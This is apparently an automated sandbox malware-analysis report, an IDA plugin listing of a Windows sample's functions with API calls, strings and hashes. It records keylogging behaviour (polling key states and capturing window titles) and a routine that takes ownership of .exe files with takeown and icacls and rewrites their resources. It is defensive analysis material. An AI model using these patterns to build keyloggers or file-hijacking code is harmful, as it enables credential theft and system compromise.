                                                                                                                                                                                                                                                      • Opcode ID: a7e7e2852162d901733bd9cb003451e439e81ea291194a1f39b14b788c7c5ea1
                                                                                                                                                                                                                                                      • Instruction ID: 4a430e91a8f863336b2687282291e13684705547ea1748166e0690fd64c8d12b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7e7e2852162d901733bd9cb003451e439e81ea291194a1f39b14b788c7c5ea1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98E0C23639022077D7301737AC0EFA73DA9EBC6F31F040134FE01E2190C9644962C265
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000,00422C60,00000000,?,0042B7F8,00000060), ref: 00425BB0
                                                                                                                                                                                                                                                        • Part of subcall function 00427433: HeapAlloc.KERNEL32(00000000,00000140,00425BD8,000003F8,?,0042B7F8,00000060), ref: 00427440
                                                                                                                                                                                                                                                      • HeapDestroy.KERNEL32(?,0042B7F8,00000060), ref: 00425BE3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$AllocCreateDestroy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2236781399-0
                                                                                                                                                                                                                                                      • Opcode ID: 515d63fb8d1a4909140f08a63f5b198cdef78c224400cc72ab3f26efe8c330c1
                                                                                                                                                                                                                                                      • Instruction ID: 7544e6c939ce91180a6ab0966c6dc760d355c7477ffebe0e505c52c9fcc3e56c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 515d63fb8d1a4909140f08a63f5b198cdef78c224400cc72ab3f26efe8c330c1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AE04870B547505BDB116F71BD0572A7EF4DB44757FD4043AF400C9190FB789550D50A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00410C48
                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00410C4F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                                                                                                                      • Opcode ID: 969254deb2add1187b88b354c7ae7fe4fc641dc09986d8278be8f81eb28bda17
                                                                                                                                                                                                                                                      • Instruction ID: a6d593b0423ec023e5a7d9a3c9df955ab54794e0b81865e68d434db1e99dc6aa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 969254deb2add1187b88b354c7ae7fe4fc641dc09986d8278be8f81eb28bda17
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7C04C35604201EBDF155F909A0CB4A7A68AB54702F40C414B646910A0A6B58491EF56
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,0040D2A9,00000000), ref: 00414DA4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                                      • Opcode ID: be5cc59e789f861664658e48bd89c188ad812a6811f4700a052b99e26e539987
                                                                                                                                                                                                                                                      • Instruction ID: 1e1558fb8b0164460d63e7c9d042b0b03a7d8c51ed854541774a8aeec67ebbc2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be5cc59e789f861664658e48bd89c188ad812a6811f4700a052b99e26e539987
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8C092303C0300BAFE314A00AC07F047611A740F01F304014BB80BC0E085E12165960D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000,0040C71D,00000000), ref: 00413A9B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                                      • Opcode ID: 6a766d55de5806cb64bf156286ed74061e33ddd11af47f180c1e3163fbbd4410
                                                                                                                                                                                                                                                      • Instruction ID: 7233bf50e2f4aa5628624fa1b3fb2043d1fc11f99b5e30410f9e75dee4eb0990
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a766d55de5806cb64bf156286ed74061e33ddd11af47f180c1e3163fbbd4410
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEB012753140008BCB1807349C4D04D35506F447317600B7CB033D11F0D721CD71BA01
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 004095CF
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 004095EB
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 0040A682
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0040A696
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(?), ref: 0040A6A8
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000014), ref: 0040A6B6
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000014), ref: 0040A6E0
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0040A73A
                                                                                                                                                                                                                                                      • GetWindowTextA.USER32(00000000,?,000000C7), ref: 0040A750
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0040A75D
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00457AB8), ref: 0040A816
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00457AB8), ref: 0040A832
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00457AB8,0042A4DC), ref: 0040A846
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: State$Sleeplstrlen$Window$AsyncForegroundTextlstrcat
                                                                                                                                                                                                                                                      • String ID: $ $!$!$"$"$#$#$$$$$%$&$'$($)$*$*$*$+$+$+$,$,$-$-$-$-$/$/$/$0$0$0$0$1$1$1$1$2$2$2$2$3$3$3$3$4$4$4$4$5$5$5$5$6$6$6$7$7$7$7$8$8$8$8$9$9$9$9$:$;$<$=$>$?$@$A$A$B$B$C$C$D$D$E$E$F$F$G$G$H$H$I$I$J$J$K$K$L$L$M$M$N$N$O$O$P$P$Q$Q$R$R$S$S$T$T$U$U$V$V$W$W$X$X$Y$Y$Z$Z$[$[$[<]$[<]$[C]$[T]$[T]$\$\$]$^$_$`$`$a$a$b$b$c$c$d$d$e$e$f$f$g$g$h$h$i$i$j$j$k$k$l$m$m$n$n$o$o$p$p$q$q$r$r$s$s$t$t$u$u$v$v$w$w$x$x$y$y$z$z${${${C@$|$}$~
                                                                                                                                                                                                                                                      • API String ID: 3575194195-3582245935
                                                                                                                                                                                                                                                      • Opcode ID: 8854861286730337773018bca92a435ae2a34e7a5e9d0326d75932680d368b89
                                                                                                                                                                                                                                                      • Instruction ID: df153dc5a53d45ebde2be742832d1a1b3fb3dbbf52d9bd87248e0ab54d23e74c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8854861286730337773018bca92a435ae2a34e7a5e9d0326d75932680d368b89
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AB2FB75924628AEDB62CB68CC053DBBBB1AF48345F4148E5C20CF7150DBB56F898F4A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTicklstrcmplstrlen
                                                                                                                                                                                                                                                      • String ID: 4941262305804196$lsat$pcid$sat$scc$srn$tdc$tzs
                                                                                                                                                                                                                                                      • API String ID: 2027369598-293408892
                                                                                                                                                                                                                                                      • Opcode ID: d83c2739a2cb9d19d5282ff5310fc4918b2ea2d78647d55a05f876a553792e32
                                                                                                                                                                                                                                                      • Instruction ID: cd2cc601e63a37e43ad3a66486eb1478b7bfac2c886f719d25a3961c064db815
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d83c2739a2cb9d19d5282ff5310fc4918b2ea2d78647d55a05f876a553792e32
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BB1F331644259FADF226F709C05EAA3FAD5B15B06F508073FC24611E2D33DEA21AB1A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000032), ref: 00408923
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 0040893E
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00408951
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004089C5
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004089F2
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,.exe), ref: 00408A2A
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?), ref: 00408A34
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00408AA1
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00408AD9
                                                                                                                                                                                                                                                      • GetUserNameA.ADVAPI32(00000000,0000007F), ref: 00408AE9
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00408B02
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,takeown,?,00000000,00000000), ref: 00408B19
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(?,00000010), ref: 00408C90
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(0042A784,776AC310,00000001,0042A784,0040DAA0,00000001,0042A784), ref: 00413799
                                                                                                                                                                                                                                                        • Part of subcall function 00413761: lstrlenA.KERNEL32(00000001), ref: 0041379F
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00408B39
                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,00000000,icacls,?,00000000,00000000), ref: 00408B4E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 00408B59
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 00408B76
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0), ref: 00408B8E
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00408B9B
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 00408BAB
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 00408BD6
                                                                                                                                                                                                                                                      • EnumResourceNamesA.KERNEL32(00000000,0000000E,00406D90,00000000), ref: 00408BF1
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00408C00
                                                                                                                                                                                                                                                      • MoveFileA.KERNEL32(?,?), ref: 00408C1A
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000002), ref: 00408C2D
                                                                                                                                                                                                                                                        • Part of subcall function 00409201: SetFileAttributesA.KERNEL32(00000000,00000080,0040952A,00000000,00402188,00000000), ref: 0040920A
                                                                                                                                                                                                                                                        • Part of subcall function 00409201: LoadLibraryA.KERNEL32(?,?), ref: 00409223
                                                                                                                                                                                                                                                        • Part of subcall function 00409201: BeginUpdateResourceA.KERNEL32(?,00000001), ref: 00409236
                                                                                                                                                                                                                                                        • Part of subcall function 00409201: EnumResourceNamesA.KERNEL32(00000000,0000000E,004091E1,00000000), ref: 0040924B
                                                                                                                                                                                                                                                        • Part of subcall function 00409201: EndUpdateResourceA.KERNEL32(00000000,00000000), ref: 00409254
                                                                                                                                                                                                                                                        • Part of subcall function 00409201: FreeLibrary.KERNEL32(00000000), ref: 0040925B
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 00408CA3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Filelstrlenwsprintf$LibraryResource$Findlstrcat$AttributesEnumExecuteFreeLoadNamesShellSleepUpdate$BeginCloseFirstMoveNameNextUserlstrcmpilstrcpy
                                                                                                                                                                                                                                                      • String ID: "%s" /grant %s:D$%s\%s$%s\*$.$.exe$/f "%s"$common$icacls$takeown$winrar
                                                                                                                                                                                                                                                      • API String ID: 129874200-1007597167
                                                                                                                                                                                                                                                      • Opcode ID: fef2203b3cafb2106d3b506206465eebb1ea86fbe2a034fd1f88a0c5e7fef4d8
                                                                                                                                                                                                                                                      • Instruction ID: 2269f8bd79c62046c8ac0baabdbb9edcdb8c59620273d61e71fc7e47dc0d7b65
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fef2203b3cafb2106d3b506206465eebb1ea86fbe2a034fd1f88a0c5e7fef4d8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5A1847294421CABDF20DBA0DD49FDA77BCAB44305F0440ABE944F2181DB799B898F69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 0040902E
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00409042
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040904F
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040905D
                                                                                                                                                                                                                                                      • UpdateResourceA.KERNEL32(?,?,?,?,?,00000000), ref: 00409074
                                                                                                                                                                                                                                                      • LookupIconIdFromDirectoryEx.USER32(?,00000001,00000010,00000010,00000000), ref: 00409086
                                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,00000003), ref: 00409097
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004090A3
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004090A6
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,?), ref: 004090B1
                                                                                                                                                                                                                                                      • UpdateResourceA.KERNEL32(?,00000003,?,?,?,00000000), ref: 004090C6
                                                                                                                                                                                                                                                      • LookupIconIdFromDirectoryEx.USER32(?,00000001,00000030,00000030,00000000), ref: 004090D8
                                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,00000003), ref: 004090E9
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004090F5
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004090F8
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,?), ref: 00409103
                                                                                                                                                                                                                                                      • UpdateResourceA.KERNEL32(?,00000003,?,?,?,00000000), ref: 00409118
                                                                                                                                                                                                                                                      • LookupIconIdFromDirectoryEx.USER32(?,00000001,00000020,00000020,00000000), ref: 0040912A
                                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,00000003), ref: 0040913B
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 00409147
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040914A
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,?), ref: 00409155
                                                                                                                                                                                                                                                      • UpdateResourceA.KERNEL32(?,00000003,?,?,?,00000000), ref: 0040916A
                                                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,00000000,00000003), ref: 0040917E
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 0040918E
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00409191
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,?), ref: 0040919C
                                                                                                                                                                                                                                                      • UpdateResourceA.KERNEL32(?,00000003,?,?,?,00000000), ref: 004091B3
                                                                                                                                                                                                                                                      • FreeResource.KERNEL32(?), ref: 004091CE
                                                                                                                                                                                                                                                      • FreeResource.KERNEL32(?), ref: 004091D4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeofUpdate$DirectoryFromIconLookup$Free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4293049711-0
                                                                                                                                                                                                                                                      • Opcode ID: a1d6c37a740b477b33ebc72f89dac7cc81a38640dfe682816ad91298d220abaf
                                                                                                                                                                                                                                                      • Instruction ID: 117c28e06bb043129752a4c397bc6654641652e639958cb8c3de27d6e2a33916
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1d6c37a740b477b33ebc72f89dac7cc81a38640dfe682816ad91298d220abaf
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E512E71518300BFE7125F61DD05F2FBAEDFF89B04F400919FA84A1160C676CA219F6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00412FF4
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00412FF6
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041304E
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041307A
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004130E4
